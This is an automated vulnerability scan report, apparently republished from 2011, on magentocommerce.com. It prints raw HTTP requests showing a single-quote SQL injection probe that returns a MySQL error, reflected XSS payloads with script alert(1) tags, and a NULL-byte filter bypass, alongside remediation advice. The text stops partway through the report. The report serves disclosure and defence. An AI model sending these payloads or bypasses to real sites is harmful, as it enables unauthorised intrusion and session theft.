SQL Injection, CWE-89, CAPEc-66, Single Quote Database Injection, magentocommerce.com

Report generated by XSS.CX at Fri Aug 12 12:58:24 GMT-06:00 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. SQL injection

2. Cross-site scripting (reflected)

2.1. http://www.magentocommerce.com/boards/viewannounce/228974_11106/ [REST URL parameter 3]

2.2. http://www.magentocommerce.com/magento-connect/symmetrics+GmbH/extension/1764/market-ready-germany/ [REST URL parameter 2]

2.3. http://www.magentocommerce.com/magento-connect/symmetrics+GmbH/extension/1764/market-ready-germany/ [REST URL parameter 4]

2.4. http://www.magentocommerce.com/magento-connect/symmetrics+GmbH/extension/1764/market-ready-germany/ [REST URL parameter 5]

2.5. http://www.magentocommerce.com/magento-connect/symmetrics+GmbH/extension/1764/market-ready-germany/ [name of an arbitrarily supplied request parameter]

3. Cleartext submission of password

3.1. http://www.magentocommerce.com/boards/viewannounce/228974_11106/

3.2. http://www.magentocommerce.com/magento-connect/symmetrics+GmbH/extension/1764/market-ready-germany/

4. Cookie scoped to parent domain

4.1. http://www.magentocommerce.com/boards/viewannounce/228974_11106/

4.2. http://www.magentocommerce.com/magento-connect/symmetrics+GmbH/extension/1764/market-ready-germany/

4.3. http://www.magentocommerce.com/boards/viewannounce/228974_11106%27/

5. Cookie without HttpOnly flag set

5.1. http://www.magentocommerce.com/boards/viewannounce/228974_11106/

5.2. http://www.magentocommerce.com/magento-connect/symmetrics+GmbH/extension/1764/market-ready-germany/

5.3. http://www.magentocommerce.com/boards/viewannounce/228974_11106%27/

6. Password field with autocomplete enabled

6.1. http://www.magentocommerce.com/boards/viewannounce/228974_11106/

6.2. http://www.magentocommerce.com/magento-connect/symmetrics+GmbH/extension/1764/market-ready-germany/

7. Cross-domain POST

7.1. http://www.magentocommerce.com/boards/viewannounce/228974_11106/

7.2. http://www.magentocommerce.com/magento-connect/symmetrics+GmbH/extension/1764/market-ready-germany/

7.3. http://www.magentocommerce.com/magento-connect/symmetrics+GmbH/extension/1764/market-ready-germany/

8. Email addresses disclosed

9. Robots.txt file

10. HTML does not specify charset

10.1. http://www.magentocommerce.com/img/btn_submit.gif

10.2. http://www.magentocommerce.com/img/btn_submit_comment_blue.gif

10.3. http://www.magentocommerce.com/img/icon_post_comment.gif

10.4. http://www.magentocommerce.com/img/magento_dnld_rr.gif

11. Content type incorrectly stated



1. SQL injection  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /boards/viewannounce/228974_11106/

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

Request 1

GET /boards/viewannounce/228974_11106'/ HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.magentocommerce.com

Response 1

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 18:22:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 18:22:19 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 18:22:19 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=deleted; expires=Thu, 12-Aug-2010 18:22:19 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 18:22:19 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 18:22:19 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 18:22:19 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 18:22:19 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 18:22:19 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=deleted; expires=Thu, 12-Aug-2010 18:22:19 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=deleted; expires=Thu, 12-Aug-2010 18:22:19 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=deleted; expires=Thu, 12-Aug-2010 18:22:19 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=c; expires=Sun, 12-Aug-2012 04:30:40 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313187740; expires=Sat, 11-Aug-2012 18:22:20 GMT; path=/; domain=magentocommerce.com
Content-Length: 645

MySQL ERROR:<br /><br />Error Number: 1064<br /><br />Description: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' at line 5<br />
...[SNIP]...

Request 2

GET /boards/viewannounce/228974_11106''/ HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.magentocommerce.com

Response 2

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 18:22:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 18:22:20 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 18:22:20 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=deleted; expires=Thu, 12-Aug-2010 18:22:20 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 18:22:20 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 18:22:20 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 18:22:20 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 18:22:20 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 18:22:20 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=deleted; expires=Thu, 12-Aug-2010 18:22:20 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=deleted; expires=Thu, 12-Aug-2010 18:22:20 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=deleted; expires=Thu, 12-Aug-2010 18:22:20 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=c; expires=Sun, 12-Aug-2012 04:30:41 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313187741; expires=Sat, 11-Aug-2012 18:22:21 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 18:22:21 GMT
Content-Length: 40161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

2. Cross-site scripting (reflected)  previous  next
There are 5 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://www.magentocommerce.com/boards/viewannounce/228974_11106/ [REST URL parameter 3]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /boards/viewannounce/228974_11106/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17dac"><script>alert(1)</script>f4fec0fd87 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boards/viewannounce/17dac"><script>alert(1)</script>f4fec0fd87/ HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.magentocommerce.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 18:22:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 18:22:17 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 18:22:17 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=deleted; expires=Thu, 12-Aug-2010 18:22:17 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 18:22:17 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 18:22:17 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 18:22:17 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 18:22:17 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 18:22:17 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=deleted; expires=Thu, 12-Aug-2010 18:22:17 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=deleted; expires=Thu, 12-Aug-2010 18:22:17 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=deleted; expires=Thu, 12-Aug-2010 18:22:17 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=c; expires=Sun, 12-Aug-2012 04:30:38 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313187738; expires=Sat, 11-Aug-2012 18:22:18 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 18:22:18 GMT
Content-Length: 34543

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<input type="hidden" name="login[back_url]" value="http://www.magentocommerce.com/boards/viewannounce/17dac"><script>alert(1)</script>f4fec0fd87" />
...[SNIP]...

2.2. http://www.magentocommerce.com/magento-connect/symmetrics+GmbH/extension/1764/market-ready-germany/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.magentocommerce.com
Path:   /magento-connect/symmetrics+GmbH/extension/1764/market-ready-germany/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 124fe"><a>c2759f62def was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /magento-connect/symmetrics+GmbH124fe"><a>c2759f62def/extension/1764/market-ready-germany/ HTTP/1.1
Host: www.magentocommerce.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 18:17:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 18:17:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 18:17:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=deleted; expires=Thu, 12-Aug-2010 18:17:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=deleted; expires=Thu, 12-Aug-2010 18:17:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=deleted; expires=Thu, 12-Aug-2010 18:17:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 18:17:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 18:17:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 18:17:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 18:17:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 18:17:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=c; expires=Sun, 12-Aug-2012 04:25:32 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313187432; expires=Sat, 11-Aug-2012 18:17:12 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 18:17:13 GMT
Content-Length: 78731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="https://www.magentocommerce.com/products/customer/account/login/?back_url=http://www.magentocommerce.com/magento-connect/symmetrics+GmbH124fe"><a>c2759f62def/extension/1764/market-ready-germany/">
...[SNIP]...

2.3. http://www.magentocommerce.com/magento-connect/symmetrics+GmbH/extension/1764/market-ready-germany/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.magentocommerce.com
Path:   /magento-connect/symmetrics+GmbH/extension/1764/market-ready-germany/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5156e"><a>d619a788915 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /magento-connect/symmetrics+GmbH/extension/5156e"><a>d619a788915/market-ready-germany/ HTTP/1.1
Host: www.magentocommerce.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 18:18:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 18:18:09 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 18:18:09 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=deleted; expires=Thu, 12-Aug-2010 18:18:09 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=deleted; expires=Thu, 12-Aug-2010 18:18:09 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=deleted; expires=Thu, 12-Aug-2010 18:18:09 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 18:18:09 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 18:18:09 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 18:18:09 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 18:18:09 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 18:18:09 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=c; expires=Sun, 12-Aug-2012 04:26:30 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313187490; expires=Sat, 11-Aug-2012 18:18:10 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 18:18:11 GMT
Content-Length: 61972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/magento-connect/Woo+Themes/extension/5156e"><a>d619a788915/woo_store/reviews#reviews">
...[SNIP]...

2.4. http://www.magentocommerce.com/magento-connect/symmetrics+GmbH/extension/1764/market-ready-germany/ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /magento-connect/symmetrics+GmbH/extension/1764/market-ready-germany/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 908b5"><script>alert(1)</script>35c882b6a09 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /magento-connect/symmetrics+GmbH/extension/1764/market-ready-germany908b5"><script>alert(1)</script>35c882b6a09/ HTTP/1.1
Host: www.magentocommerce.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 18:18:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 18:18:44 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 18:18:44 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=deleted; expires=Thu, 12-Aug-2010 18:18:44 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=deleted; expires=Thu, 12-Aug-2010 18:18:44 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=deleted; expires=Thu, 12-Aug-2010 18:18:44 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 18:18:44 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 18:18:44 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 18:18:44 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 18:18:44 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 18:18:44 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=c; expires=Sun, 12-Aug-2012 04:27:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313187525; expires=Sat, 11-Aug-2012 18:18:45 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 18:18:46 GMT
Content-Length: 78562

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="https://www.magentocommerce.com/products/customer/account/login/?back_url=http://www.magentocommerce.com/magento-connect/symmetrics+GmbH/extension/1764/market-ready-germany908b5"><script>alert(1)</script>35c882b6a09/">
...[SNIP]...

2.5. http://www.magentocommerce.com/magento-connect/symmetrics+GmbH/extension/1764/market-ready-germany/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /magento-connect/symmetrics+GmbH/extension/1764/market-ready-germany/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00dbbc6"><script>alert(1)</script>60c9bacbe3d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dbbc6"><script>alert(1)</script>60c9bacbe3d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /magento-connect/symmetrics+GmbH/extension/1764/market-ready-germany/?%00dbbc6"><script>alert(1)</script>60c9bacbe3d=1 HTTP/1.1
Host: www.magentocommerce.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 18:16:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 18:16:21 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 18:16:21 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=deleted; expires=Thu, 12-Aug-2010 18:16:21 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=deleted; expires=Thu, 12-Aug-2010 18:16:21 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=deleted; expires=Thu, 12-Aug-2010 18:16:21 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 18:16:21 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 18:16:21 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 18:16:21 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 18:16:21 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 18:16:21 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=c; expires=Sun, 12-Aug-2012 04:24:42 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313187382; expires=Sat, 11-Aug-2012 18:16:22 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 18:16:22 GMT
Content-Length: 78788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="https://www.magentocommerce.com/products/customer/account/login/?back_url=http://www.magentocommerce.com/magento-connect/symmetrics+GmbH/extension/1764/market-ready-germany/?%00dbbc6"><script>alert(1)</script>60c9bacbe3d=1">
...[SNIP]...

3. Cleartext submission of password  previous  next
There are 2 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

